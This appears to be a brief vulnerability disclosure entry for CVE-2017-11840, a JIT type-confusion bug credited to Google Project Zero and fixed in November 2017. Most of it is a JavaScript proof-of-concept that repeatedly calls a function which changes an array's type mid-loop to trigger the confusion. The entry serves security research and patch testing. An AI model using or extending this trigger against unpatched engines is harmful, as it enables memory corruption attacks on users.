CVE-2017-11840

  • Fix: Nov 2017
  • Credit: lokihardt of Google Project Zero

PoC

function opt() {
    let obj = [2.3023e-320];
    for (let i = 0; i < 1; i++) {
        obj.x = 1;  // In the first analysis, BailOnNotObject is emitted
        obj = +obj;  // Change the type
        obj.x = 1;  // Type confusion
    }
}

function main() {
    for (let i = 0; i < 1000; i++) {
        opt();
    }
}

main();

Reference